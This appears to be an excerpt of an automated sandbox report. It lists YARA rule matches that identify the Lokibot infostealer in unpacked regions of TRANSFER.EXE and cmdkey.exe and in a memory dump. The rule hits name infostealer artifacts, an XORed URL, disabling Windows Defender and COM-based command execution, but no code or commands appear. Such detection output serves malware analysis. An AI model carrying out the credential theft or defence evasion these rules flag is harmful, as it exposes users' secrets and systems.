                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.TRANSFER.EXE.451dcd0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 0.2.TRANSFER.EXE.451dcd0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
